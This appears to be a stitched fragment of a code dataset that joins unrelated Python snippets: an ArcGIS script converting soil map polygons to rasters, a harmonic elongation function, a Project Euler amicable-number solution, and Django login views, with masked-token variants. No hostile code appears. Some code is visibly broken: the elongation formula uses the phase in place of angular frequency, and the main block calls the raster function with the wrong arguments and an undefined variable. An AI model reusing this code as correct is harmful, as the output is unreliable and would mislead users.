path.\r\n#\r\n# 2015-10-26 Changed up SnapToNLCD function to incorporate SnapRaster input as long as the coordinate\r\n# system matches and the extent coordinates are integer (no floating point!).\r\n#\r\n# 2015-10-27 Looking at possible issue with batchmode processing of rasters. Jennifer had several\r\n# errors when trying to run all states at once.\r\n#\r\n# 2015-11-03 Fixed failure when indexing non-geodatabase rasters such as .IMG.\r\n\r\n## ===================================================================================\r\nclass MyError(Exception):\r\n pass\r\n\r\n## ===================================================================================\r\ndef PrintMsg(msg, severity=0):\r\n # prints message to screen if run as a python script\r\n # Adds tool message to the geoprocessor\r\n #\r\n #Split the message on \\n first, so that if it's multiple lines, a GPMessage will be added for each line\r\n try:\r\n for string in msg.split('\\n'):\r\n #Add a geoprocessing message (in case this is run as a tool)\r\n if severity == 0:\r\n arcpy.AddMessage(string)\r\n\r\n elif severity == 1:\r\n arcpy.AddWarning(string)\r\n\r\n elif severity == 2:\r\n arcpy.AddMessage(\" \")\r\n arcpy.AddError(string)\r\n\r\n except:\r\n pass\r\n\r\n## ===================================================================================\r\ndef errorMsg():\r\n try:\r\n tb = sys.exc_info()[2]\r\n tbinfo = traceback.format_tb(tb)[0]\r\n theMsg = tbinfo + \"\\n\" + str(sys.exc_type)+ \": \" + str(sys.exc_value)\r\n PrintMsg(theMsg, 2)\r\n\r\n except:\r\n PrintMsg(\"Unhandled error in errorMsg method\", 2)\r\n pass\r\n\r\n## ===================================================================================\r\ndef WriteToLog(theMsg, theRptFile):\r\n # prints message to screen if run as a python script\r\n # Adds tool message to the geoprocessor\r\n #print msg\r\n #\r\n try:\r\n fh = open(theRptFile, \"a\")\r\n theMsg = \"\\n\" + theMsg\r\n fh.write(theMsg)\r\n fh.close()\r\n\r\n except:\r\n errorMsg()\r\n pass\r\n\r\n## ===================================================================================\r\ndef elapsedTime(start):\r\n # Calculate amount of time since \"start\" and return time string\r\n try:\r\n # Stop timer\r\n #\r\n end = time.time()\r\n\r\n # Calculate total elapsed seconds\r\n eTotal = end - start\r\n\r\n # day = 86400 seconds\r\n # hour = 3600 seconds\r\n # minute = 60 seconds\r\n\r\n eMsg = \"\"\r\n\r\n # calculate elapsed days\r\n eDay1 = eTotal / 86400\r\n eDay2 = math.modf(eDay1)\r\n eDay = int(eDay2[1])\r\n eDayR = eDay2[0]\r\n\r\n if eDay > 1:\r\n eMsg = eMsg + str(eDay) + \" days \"\r\n elif eDay == 1:\r\n eMsg = eMsg + str(eDay) + \" day \"\r\n\r\n # Calculated elapsed hours\r\n eHour1 = eDayR * 24\r\n eHour2 = math.modf(eHour1)\r\n eHour = int(eHour2[1])\r\n eHourR = eHour2[0]\r\n\r\n if eDay > 0 or eHour > 0:\r\n if eHour > 1:\r\n eMsg = eMsg + str(eHour) + \" hours \"\r\n else:\r\n eMsg = eMsg + str(eHour) + \" hour \"\r\n\r\n # Calculate elapsed minutes\r\n eMinute1 = eHourR * 60\r\n eMinute2 = math.modf(eMinute1)\r\n eMinute = int(eMinute2[1])\r\n eMinuteR = eMinute2[0]\r\n\r\n if eDay > 0 or eHour > 0 or eMinute > 0:\r\n if eMinute > 1:\r\n eMsg = eMsg + str(eMinute) + \" minutes \"\r\n else:\r\n eMsg = eMsg + str(eMinute) + \" minute \"\r\n\r\n # Calculate elapsed secons\r\n eSeconds = \"%.1f\" % (eMinuteR * 60)\r\n\r\n if eSeconds == \"1.00\":\r\n eMsg = eMsg + eSeconds + \" second \"\r\n else:\r\n eMsg = eMsg + eSeconds + \" seconds \"\r\n\r\n return eMsg\r\n\r\n except:\r\n errorMsg()\r\n return \"\"\r\n\r\n## ===================================================================================\r\ndef Number_Format(num, places=0, bCommas=True):\r\n try:\r\n # Format a number according to locality and given places\r\n #locale.setlocale(locale.LC_ALL, \"\")\r\n if bCommas:\r\n theNumber = locale.format(\"%.*f\", (places, num), True)\r\n\r\n else:\r\n theNumber = locale.format(\"%.*f\", (places, num), False)\r\n return theNumber\r\n\r\n except:\r\n errorMsg()\r\n return False\r\n\r\n## ===================================================================================\r\ndef CheckStatistics(outputRaster):\r\n # For no apparent reason, ArcGIS sometimes fails to build statistics. Might work one\r\n # time and then the next time it may fail without any error message.\r\n #\r\n try:\r\n #PrintMsg(\" \\n\\tChecking raster statistics\", 0)\r\n\r\n for propType in ['MINIMUM', 'MAXIMUM', 'MEAN', 'STD']:\r\n statVal = arcpy.GetRasterProperties_management (outputRaster, propType).getOutput(0)\r\n #PrintMsg(\"\\t\\t\" + propType + \": \" + statVal, 1)\r\n\r\n return True\r\n\r\n except:\r\n return False\r\n\r\n## ===================================================================================\r\ndef UpdateMetadata(outputWS, target, surveyInfo, iRaster):\r\n #\r\n # Used for non-ISO metadata\r\n #\r\n # Search words: xxSTATExx, xxSURVEYSxx, xxTODAYxx, xxFYxx\r\n #\r\n try:\r\n PrintMsg(\"\\tUpdating metadata...\")\r\n arcpy.SetProgressor(\"default\", \"Updating metadata\")\r\n\r\n # Set metadata translator file\r\n dInstall = arcpy.GetInstallInfo()\r\n installPath = dInstall[\"InstallDir\"]\r\n prod = r\"Metadata/Translator/ARCGIS2FGDC.xml\"\r\n mdTranslator = os.path.join(installPath, prod)\r\n\r\n # Define input and output XML files\r\n mdImport = os.path.join(env.scratchFolder, \"xxImport.xml\") # the metadata xml that will provide the updated info\r\n xmlPath = os.path.dirname(sys.argv[0])\r\n mdExport = os.path.join(xmlPath, \"gSSURGO_MapunitRaster.xml\") # original template metadata in script directory\r\n\r\n # Cleanup output XML files from previous runs\r\n if os.path.isfile(mdImport):\r\n os.remove(mdImport)\r\n\r\n # Get replacement value for the search words\r\n #\r\n stDict = StateNames()\r\n st = os.path.basename(outputWS)[8:-4]\r\n\r\n if st in stDict:\r\n # Get state name from the geodatabase\r\n mdState = stDict[st]\r\n\r\n else:\r\n # Leave state name blank. In the future it would be nice to include a tile name when appropriate\r\n mdState = \"\"\r\n\r\n # Set date strings for metadata, based upon today's date\r\n #\r\n d = datetime.date.today()\r\n today = str(d.isoformat().replace(\"-\",\"\"))\r\n\r\n # Set fiscal year according to the current month. If run during January thru September,\r\n # set it to the current calendar year. Otherwise set it to the next calendar year.\r\n #\r\n if d.month > 9:\r\n fy = \"FY\" + str(d.year + 1)\r\n\r\n else:\r\n fy = \"FY\" + str(d.year)\r\n\r\n # Convert XML to tree format\r\n tree = ET.parse(mdExport)\r\n root = tree.getroot()\r\n\r\n # new citeInfo has title.text, edition.text, serinfo/issue.text\r\n citeInfo = root.findall('idinfo/citation/citeinfo/')\r\n\r\n if not citeInfo is None:\r\n # Process citation elements\r\n # title, edition, issue\r\n #\r\n for child in citeInfo:\r\n #PrintMsg(\"\\t\\t\" + str(child.tag), 0)\r\n if child.tag == \"title\":\r\n if child.text.find('xxSTATExx') >= 0:\r\n child.text = child.text.replace('xxSTATExx', mdState)\r\n\r\n elif mdState != \"\":\r\n child.text = child.text + \" - \" + mdState\r\n\r\n elif child.tag == \"edition\":\r\n if child.text == 'xxFYxx':\r\n child.text = fy\r\n\r\n elif child.tag == \"serinfo\":\r\n for subchild in child.iter('issue'):\r\n if subchild.text == \"xxFYxx\":\r\n subchild.text = fy\r\n\r\n # Update place keywords\r\n ePlace = root.find('idinfo/keywords/place')\r\n\r\n if not ePlace is None:\r\n #PrintMsg(\"\\t\\tplace keywords\", 0)\r\n\r\n for child in ePlace.iter('placekey'):\r\n if child.text == \"xxSTATExx\":\r\n child.text = mdState\r\n\r\n elif child.text == \"xxSURVEYSxx\":\r\n child.text = surveyInfo\r\n\r\n # Update credits\r\n eIdInfo = root.find('idinfo')\r\n if not eIdInfo is None:\r\n #PrintMsg(\"\\t\\tcredits\", 0)\r\n\r\n for child in eIdInfo.iter('datacred'):\r\n sCreds = child.text\r\n\r\n if sCreds.find(\"xxSTATExx\") >= 0:\r\n #PrintMsg(\"\\t\\tcredits \" + mdState, 0)\r\n child.text = child.text.replace(\"xxSTATExx\", mdState)\r\n\r\n if sCreds.find(\"xxFYxx\") >= 0:\r\n #PrintMsg(\"\\t\\tcredits \" + fy, 0)\r\n child.text = child.text.replace(\"xxFYxx\", fy)\r\n\r\n if sCreds.find(\"xxTODAYxx\") >= 0:\r\n #PrintMsg(\"\\t\\tcredits \" + today, 0)\r\n child.text = child.text.replace(\"xxTODAYxx\", today)\r\n\r\n idPurpose = root.find('idinfo/descript/purpose')\r\n if not idPurpose is None:\r\n ip = idPurpose.text\r\n\r\n if ip.find(\"xxFYxx\") >= 0:\r\n idPurpose.text = ip.replace(\"xxFYxx\", fy)\r\n #PrintMsg(\"\\t\\tpurpose\", 0)\r\n\r\n # create new xml file which will be imported, thereby updating the table's metadata\r\n tree.write(mdImport, encoding=\"utf-8\", xml_declaration=None, default_namespace=None, method=\"xml\")\r\n\r\n # import updated metadata to the geodatabase table\r\n # Using three different methods with the same XML file works for ArcGIS 10.1\r\n #\r\n #PrintMsg(\"\\t\\tApplying metadata translators...\")\r\n arcpy.MetadataImporter_conversion (mdImport, target)\r\n arcpy.ImportMetadata_conversion(mdImport, \"FROM_FGDC\", target, \"DISABLED\")\r\n\r\n # delete the temporary xml metadata file\r\n if os.path.isfile(mdImport):\r\n os.remove(mdImport)\r\n pass\r\n\r\n # delete metadata tool logs\r\n logFolder = os.path.dirname(env.scratchFolder)\r\n logFile = os.path.basename(mdImport).split(\".\")[0] + \"*\"\r\n\r\n\r\n currentWS = env.workspace\r\n env.workspace = logFolder\r\n logList = arcpy.ListFiles(logFile)\r\n\r\n for lg in logList:\r\n arcpy.Delete_management(lg)\r\n\r\n env.workspace = currentWS\r\n\r\n return True\r\n\r\n except:\r\n errorMsg()\r\n False\r\n\r\n## ===================================================================================\r\ndef CheckSpatialReference(muPolygon):\r\n # Make sure that the coordinate system is projected and units are meters\r\n try:\r\n desc = arcpy.Describe(muPolygon)\r\n inputSR = desc.spatialReference\r\n\r\n if inputSR.type.upper() == \"PROJECTED\":\r\n if inputSR.linearUnitName.upper() == \"METER\":\r\n env.outputCoordinateSystem = inputSR\r\n return True\r\n\r\n else:\r\n raise MyError, os.path.basename(theGDB) + \": Input soil polygon layer does not have a valid coordinate system for gSSURGO\"\r\n\r\n else:\r\n raise MyError, os.path.basename(theGDB) + \": Input soil polygon layer must have a projected coordinate system\"\r\n\r\n except MyError, e:\r\n # Example: raise MyError, \"This is an error message\"\r\n PrintMsg(str(e), 2)\r\n return False\r\n\r\n except:\r\n errorMsg()\r\n return False\r\n\r\n## ===================================================================================\r\ndef ConvertToRaster(muPolygon, rasterName):\r\n # main function used for raster conversion\r\n try:\r\n #\r\n # Set geoprocessing environment\r\n #\r\n env.overwriteOutput = True\r\n arcpy.env.compression = \"LZ77\"\r\n env.tileSize = \"128 128\"\r\n\r\n gdb = os.path.dirname(muPolygon)\r\n outputRaster = os.path.join(gdb, rasterName)\r\n iRaster = 10 # output resolution is 10 meters\r\n\r\n # Make sure that the env.scratchGDB is NOT Default.gdb. This causes problems for\r\n # some unknown reason.\r\n if (os.path.basename(env.scratchGDB).lower() == \"default.gdb\") or \\\r\n (os.path.basename(env.scratchWorkspace).lower() == \"default.gdb\") or \\\r\n (os.path.basename(env.scratchGDB).lower() == gdb):\r\n raise MyError, \"Invalid scratch workspace setting (\" + env.scratchWorkspace + \")\"\r\n\r\n # Create an ArcInfo workspace under the scratchFolder. Trying to prevent\r\n # 99999 errors for PolygonToRaster on very large databases\r\n #\r\n aiWorkspace = env.scratchFolder\r\n\r\n if not arcpy.Exists(os.path.join(aiWorkspace, \"info\")):\r\n #PrintMsg(\" \\nCreating ArcInfo workspace (\" + os.path.basename(aiWorkspace) + \") in: \" + os.path.dirname(aiWorkspace), 1)\r\n arcpy.CreateArcInfoWorkspace_management(os.path.dirname(aiWorkspace), os.path.basename(aiWorkspace))\r\n\r\n # turn off automatic Pyramid creation and Statistics calculation\r\n env.rasterStatistics = \"NONE\"\r\n env.pyramid = \"PYRAMIDS 0\"\r\n env.workspace = gdb\r\n\r\n # Need to check for dashes or spaces in folder names or leading numbers in database or raster names\r\n desc = arcpy.Describe(muPolygon)\r\n\r\n if not arcpy.Exists(muPolygon):\r\n raise MyError, \"Could not find input featureclass: \" + muPolygon\r\n\r\n # Check input layer's coordinate system to make sure horizontal units are meters\r\n # set the output coordinate system for the raster (neccessary for PolygonToRaster)\r\n if CheckSpatialReference(muPolygon) == False:\r\n return False\r\n\r\n # Sometimes it helps to compact large databases before raster conversion\r\n #arcpy.SetProgressorLabel(\"Compacting database prior to rasterization...\")\r\n #arcpy.Compact_management(gdb)\r\n\r\n # For rasters named using an attribute value, some attribute characters can result in\r\n # 'illegal' names.\r\n outputRaster = outputRaster.replace(\"-\", \"\")\r\n\r\n if arcpy.Exists(outputRaster):\r\n arcpy.Delete_management(outputRaster)\r\n time.sleep(1)\r\n\r\n if arcpy.Exists(outputRaster):\r\n err = \"Output raster (\" + os.path.basename(outputRaster) + \") already exists\"\r\n raise MyError, err\r\n\r\n #start = time.time() # start clock to measure total processing time\r\n #begin = time.time() # start clock to measure set up time\r\n time.sleep(2)\r\n\r\n PrintMsg(\" \\nBeginning raster conversion process\", 0)\r\n\r\n # Create Lookup table for storing MUKEY values and their integer counterparts\r\n #\r\n lu = os.path.join(env.scratchGDB, \"Lookup\")\r\n\r\n if arcpy.Exists(lu):\r\n arcpy.Delete_management(lu)\r\n\r\n # The Lookup table contains both MUKEY and its integer counterpart (CELLVALUE).\r\n # Using the joined lookup table creates a raster with CellValues that are the\r\n # same as MUKEY (but integer). This will maintain correct MUKEY values\r\n # during a moscaic or clip.\r\n #\r\n arcpy.CreateTable_management(os.path.dirname(lu), os.path.basename(lu))\r\n arcpy.AddField_management(lu, \"CELLVALUE\", \"LONG\")\r\n arcpy.AddField_management(lu, \"mukey\", \"TEXT\", \"#\", \"#\", \"30\")\r\n\r\n # Create list of areasymbols present in the MUPOLYGON featureclass\r\n # Having problems processing CONUS list of MUKEYs. Python seems to be running out of memory,\r\n # but I don't see high usage in Windows Task Manager\r\n #\r\n # PrintMsg(\" \\nscratchFolder set to: \" + env.scratchFolder, 1)\r\n\r\n\r\n # Create list of MUKEY values from the MUPOLYGON featureclass\r\n #\r\n # Create a list of map unit keys present in the MUPOLYGON featureclass\r\n #\r\n PrintMsg(\"\\tGetting list of mukeys from input soil polygon layer...\", 0)\r\n arcpy.SetProgressor(\"default\", \"Getting inventory of map units...\")\r\n tmpPolys = \"SoilPolygons\"\r\n sqlClause = (\"DISTINCT\", None)\r\n\r\n with arcpy.da.SearchCursor(muPolygon, [\"mukey\"], \"\", \"\", \"\", sql_clause=sqlClause) as srcCursor:\r\n # Create a unique, sorted list of MUKEY values in the MUPOLYGON featureclass\r\n mukeyList = [row[0] for row in srcCursor]\r\n\r\n mukeyList.sort()\r\n\r\n if len(mukeyList) == 0:\r\n raise MyError, \"Failed to get MUKEY values from \" + muPolygon\r\n\r\n muCnt = len(mukeyList)\r\n\r\n # Load MUKEY values into Lookup table\r\n #\r\n #PrintMsg(\"\\tSaving \" + Number_Format(muCnt, 0, True) + \" MUKEY values for \" + Number_Format(polyCnt, 0, True) + \" polygons\" , 0)\r\n arcpy.SetProgressorLabel(\"Creating lookup table...\")\r\n\r\n with arcpy.da.InsertCursor(lu, (\"CELLVALUE\", \"mukey\") ) as inCursor:\r\n for mukey in mukeyList:\r\n rec = mukey, mukey\r\n inCursor.insertRow(rec)\r\n\r\n # Add MUKEY attribute index to Lookup table\r\n arcpy.AddIndex_management(lu, [\"mukey\"], \"Indx_LU\")\r\n\r\n #\r\n # End of Lookup table code\r\n\r\n # Match NLCD raster (snapraster)\r\n cdlRasters = arcpy.ListRasters(\"wsCDL*\")\r\n\r\n if len(cdlRasters) == 0:\r\n raise MyError, \"Required Cropland Data Layer rasters missing from \" + gdb\r\n\r\n else:\r\n cdlRaster = cdlRasters[-1]\r\n\r\n env.snapRaster = cdlRaster\r\n #env.extent = cdlRaster\r\n\r\n # Raster conversion process...\r\n #\r\n PrintMsg(\" \\nConverting featureclass \" + os.path.basename(muPolygon) + \" to raster (\" + str(iRaster) + \" meter)\", 0)\r\n tmpPolys = \"poly_tmp\"\r\n arcpy.MakeFeatureLayer_management (muPolygon, tmpPolys)\r\n arcpy.AddJoin_management (tmpPolys, \"mukey\", lu, \"mukey\", \"KEEP_ALL\")\r\n arcpy.SetProgressor(\"default\", \"Running PolygonToRaster conversion...\")\r\n\r\n\r\n # Need to make sure that the join was successful\r\n time.sleep(1)\r\n rasterFields = arcpy.ListFields(tmpPolys)\r\n rasterFieldNames = list()\r\n\r\n for rFld in rasterFields:\r\n rasterFieldNames.append(rFld.name.upper())\r\n\r\n if not \"LOOKUP.CELLVALUE\" in rasterFieldNames:\r\n raise MyError, \"Join failed for Lookup table (CELLVALUE)\"\r\n\r\n if (os.path.basename(muPolygon).upper() + \".MUKEY\") in rasterFieldNames:\r\n #raise MyError, \"Join failed for Lookup table (SPATIALVERSION)\"\r\n priorityFld = os.path.basename(muPolygon) + \".MUKEY\"\r\n\r\n else:\r\n priorityFld = os.path.basename(muPolygon) + \".CELLVALUE\"\r\n\r\n\r\n #ListEnv()\r\n arcpy.PolygonToRaster_conversion(tmpPolys, \"Lookup.CELLVALUE\", outputRaster, \"MAXIMUM_COMBINED_AREA\", \"\", iRaster) # No priority field for single raster\r\n\r\n # immediately delete temporary polygon layer to free up memory for the rest of the process\r\n time.sleep(1)\r\n arcpy.Delete_management(tmpPolys)\r\n\r\n # End of single raster process\r\n\r\n\r\n # Now finish up the single temporary raster\r\n #\r\n PrintMsg(\" \\nFinalizing raster conversion process:\", 0)\r\n # Reset the stopwatch for the raster post-processing\r\n #begin = time.time()\r\n\r\n # Remove lookup table\r\n if arcpy.Exists(lu):\r\n arcpy.Delete_management(lu)\r\n\r\n # ****************************************************\r\n # Build pyramids and statistics\r\n # ****************************************************\r\n if arcpy.Exists(outputRaster):\r\n time.sleep(1)\r\n arcpy.SetProgressor(\"default\", \"Calculating raster statistics...\")\r\n PrintMsg(\"\\tCalculating raster statistics...\", 0)\r\n env.pyramid = \"PYRAMIDS -1 NEAREST\"\r\n arcpy.env.rasterStatistics = 'STATISTICS 100 100'\r\n arcpy.CalculateStatistics_management (outputRaster, 1, 1, \"\", \"OVERWRITE\" )\r\n\r\n if CheckStatistics(outputRaster) == False:\r\n # For some reason the BuildPyramidsandStatistics command failed to build statistics for this raster.\r\n #\r\n # Try using CalculateStatistics while setting an AOI\r\n PrintMsg(\"\\tInitial attempt to create statistics failed, trying another method...\", 0)\r\n time.sleep(3)\r\n\r\n if arcpy.Exists(os.path.join(gdb, \"SAPOLYGON\")):\r\n # Try running CalculateStatistics with an AOI to limit the area that is processed\r\n # if we have to use SAPOLYGON as an AOI, this will be REALLY slow\r\n #arcpy.CalculateStatistics_management (outputRaster, 1, 1, \"\", \"OVERWRITE\", os.path.join(outputWS, \"SAPOLYGON\") )\r\n arcpy.CalculateStatistics_management (outputRaster, 1, 1, \"\", \"OVERWRITE\" )\r\n\r\n if CheckStatistics(outputRaster) == False:\r\n time.sleep(3)\r\n PrintMsg(\"\\tFailed in both attempts to create statistics for raster layer\", 1)\r\n\r\n arcpy.SetProgressor(\"default\", \"Building pyramids...\")\r\n PrintMsg(\"\\tBuilding pyramids...\", 0)\r\n arcpy.BuildPyramids_management(outputRaster, \"-1\", \"NONE\", \"NEAREST\", \"DEFAULT\", \"\", \"SKIP_EXISTING\")\r\n\r\n # ****************************************************\r\n # Add MUKEY to final raster\r\n # ****************************************************\r\n # Build attribute table for final output raster. Sometimes it fails to automatically build.\r\n PrintMsg(\"\\tBuilding raster attribute table and updating MUKEY values\", )\r\n arcpy.SetProgressor(\"default\", \"Building raster attrribute table...\")\r\n arcpy.BuildRasterAttributeTable_management(outputRaster)\r\n\r\n # Add MUKEY values to final mapunit raster\r\n #\r\n arcpy.SetProgressor(\"default\", \"Adding MUKEY attribute to raster...\")\r\n arcpy.AddField_management(outputRaster, \"MUKEY\", \"TEXT\", \"#\", \"#\", \"30\")\r\n with arcpy.da.UpdateCursor(outputRaster, [\"VALUE\", \"MUKEY\"]) as cur:\r\n for rec in cur:\r\n rec[1] = rec[0]\r\n cur.updateRow(rec)\r\n\r\n # Add attribute index (MUKEY) for raster\r\n arcpy.AddIndex_management(outputRaster, [\"mukey\"], \"Indx_RasterMukey\")\r\n\r\n else:\r\n err = \"Missing output raster (\" + outputRaster + \")\"\r\n raise MyError, err\r\n\r\n # Compare list of original mukeys with the list of raster mukeys\r\n # Report discrepancies. These are usually thin polygons along survey boundaries,\r\n # added to facilitate a line-join.\r\n #\r\n arcpy.SetProgressor(\"default\", \"Looking for missing map units...\")\r\n rCnt = int(arcpy.GetRasterProperties_management (outputRaster, \"UNIQUEVALUECOUNT\").getOutput(0))\r\n\r\n if rCnt <> muCnt:\r\n missingList = list()\r\n rList = list()\r\n\r\n # Create list of raster mukeys...\r\n with arcpy.da.SearchCursor(outputRaster, (\"MUKEY\",)) as rcur:\r\n for rec in rcur:\r\n mukey = rec[0]\r\n rList.append(mukey)\r\n\r\n missingList = list(set(mukeyList) - set(rList))\r\n queryList = list()\r\n for mukey in missingList:\r\n queryList.append(\"'\" + mukey + \"'\")\r\n\r\n if len(queryList) > 0:\r\n PrintMsg(\"\\tDiscrepancy in mapunit count for new raster\", 1)\r\n #PrintMsg(\"\\t\\tInput polygon mapunits: \" + Number_Format(muCnt, 0, True), 0)\r\n #PrintMsg(\"\\t\\tOutput raster mapunits: \" + Number_Format(rCnt, 0, True), 0)\r\n PrintMsg(\"The following MUKEY values were present in the original MUPOLYGON featureclass, \", 1)\r\n PrintMsg(\"but not in the raster\", 1)\r\n PrintMsg(\"\\t\\tMUKEY IN (\" + \", \".join(queryList) + \") \\n \", 0)\r\n\r\n # Update metadata file for the geodatabase\r\n #\r\n # Query the output SACATALOG table to get list of surveys that were exported to the gSSURGO\r\n #\r\n #saTbl = os.path.join(theGDB, \"sacatalog\")\r\n #expList = list()\r\n\r\n #with arcpy.da.SearchCursor(saTbl, (\"AREASYMBOL\", \"SAVEREST\")) as srcCursor:\r\n # for rec in srcCursor:\r\n # expList.append(rec[0] + \" (\" + str(rec[1]).split()[0] + \")\")\r\n\r\n #surveyInfo = \", \".join(expList)\r\n surveyInfo = \"\" # could get this from SDA\r\n #time.sleep(2)\r\n arcpy.SetProgressorLabel(\"Updating metadata NOT...\")\r\n\r\n #bMetaData = UpdateMetadata(outputWS, outputRaster, surveyInfo, iRaster)\r\n\r\n del outputRaster\r\n del muPolygon\r\n\r\n arcpy.CheckInExtension(\"Spatial\")\r\n\r\n return True\r\n\r\n except MyError, e:\r\n # Example: raise MyError, \"This is an error message\"\r\n PrintMsg(str(e), 2)\r\n arcpy.CheckInExtension(\"Spatial\")\r\n return False\r\n\r\n except MemoryError:\r\n \traise MyError, \"Not enough memory to process. Try running again with the 'Use tiles' option\"\r\n\r\n except:\r\n errorMsg()\r\n arcpy.CheckInExtension(\"Spatial\")\r\n return False\r\n\r\n## ===================================================================================\r\n## ===================================================================================\r\n## MAIN\r\n## ===================================================================================\r\n\r\n# Import system modules\r\nimport sys, string, os, arcpy, locale, traceback, math, time, datetime, shutil\r\nimport xml.etree.cElementTree as ET\r\nfrom arcpy import env\r\n\r\n# Create the Geoprocessor object\r\ntry:\r\n if __name__ == \"__main__\":\r\n # get parameters\r\n muPolygon = arcpy.GetParameterAsText(0) # required gSSURGO polygon layer\r\n rasterName = arcpy.GetParameterAsText(1) # required name for output gdb raster\r\n\r\n env.overwriteOutput= True\r\n iRaster = 10\r\n\r\n # Get Spatial Analyst extension\r\n if arcpy.CheckExtension(\"Spatial\") == \"Available\":\r\n # try to find the name of the tile from the geodatabase name\r\n # set the name of the output raster using the tilename and cell resolution\r\n from arcpy.sa import *\r\n arcpy.CheckOutExtension(\"Spatial\")\r\n\r\n else:\r\n raise MyError, \"Required Spatial Analyst extension is not available\"\r\n\r\n # Call function that does all of the work\r\n bRaster = ConvertToRaster(muPolygon, theSnapRaster, iRaster)\r\n arcpy.CheckInExtension(\"Spatial\")\r\n\r\nexcept MyError, e:\r\n # Example: raise MyError, \"This is an error message\"\r\n PrintMsg(str(e), 2)\r\n\r\nexcept:\r\n errorMsg()\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import math as m
def calcula_elongacao(A, ϕ, ω, t):
x = A * m.cos(ϕ + ϕ * t )
return x
|
normal
|
{
"blob_id": "225687729b64f455bcc841e83105c7444efdfad3",
"index": 5545,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef calcula_elongacao(A, φ, ω, t):\n x = A * m.cos(φ + φ * t)\n return x\n",
"step-3": "import math as m\n\n\ndef calcula_elongacao(A, φ, ω, t):\n x = A * m.cos(φ + φ * t)\n return x\n",
"step-4": "import math as m\n\ndef calcula_elongacao(A, ϕ, ω, t):\n x = A * m.cos(ϕ + ϕ * t )\n return x",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# 1.闭包
# 2.装饰圈初识
# 3.标准版装饰器
|
normal
|
{
"blob_id": "a1ebb00d7cda65cb528b2253e817d925214cdce3",
"index": 5847,
"step-1": "# 1.闭包\n# 2.装饰圈初识\n# 3.标准版装饰器",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
#! /usr/bin/python
# Project Euler problem 21
"""Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).
If d(a) = b and d(b) = a, where a != b, then a and b are an amicable pair and each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10,000."""
import math
# This is inefficient.
def get_divs(n):
divs = [1]
check = 2
rootn = math.sqrt(n)
while check < rootn:
if n % check == 0:
divs.append(check)
divs.append(n / check)
check += 1
if rootn == check:
divs.append(check)
divs.sort()
return divs
def amicable(a):
b = sum(get_divs(a))
if a == b: return 0
sum_b_divs = sum(get_divs(b))
if a == sum_b_divs:
return b
return 0
print sum([amicable(i) for i in range(1, 10000)])
|
normal
|
{
"blob_id": "2ee5991e2b6de6ee48c8207f2b78574fc8a02fc0",
"index": 2432,
"step-1": "#! /usr/bin/python\n\n# Project Euler problem 21\n\n\"\"\"Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).\nIf d(a) = b and d(b) = a, where a != b, then a and b are an amicable pair and each of a and b are called amicable numbers.\n\nFor example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.\n\nEvaluate the sum of all the amicable numbers under 10,000.\"\"\"\n\nimport math\n\n# This is inefficient.\ndef get_divs(n): \n divs = [1] \n check = 2 \n rootn = math.sqrt(n)\n \n while check < rootn: \n if n % check == 0: \n divs.append(check) \n divs.append(n / check) \n check += 1\n \n if rootn == check: \n divs.append(check) \n divs.sort()\n \n return divs \n\ndef amicable(a):\n b = sum(get_divs(a))\n \n if a == b: return 0\n \n sum_b_divs = sum(get_divs(b))\n \n if a == sum_b_divs:\n return b\n \n return 0\n\nprint sum([amicable(i) for i in range(1, 10000)])\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponse
# Create your views here.
def check(request):
if not request.user.is_authenticated:
return redirect('/auth/login/')
else:
return redirect('/worker/')
def loginpg(request):
return render(request, 'registration/login.html')
def logoutpg(request):
logout(request)
return render(request, 'registration/logout.html')
def auth(request):
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('/worker/')
else:
return render(request, 'registration/login_error.html')
|
normal
|
{
"blob_id": "fc2afc99dc754b58c36bc76c723727337851cc3e",
"index": 5326,
"step-1": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-3": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
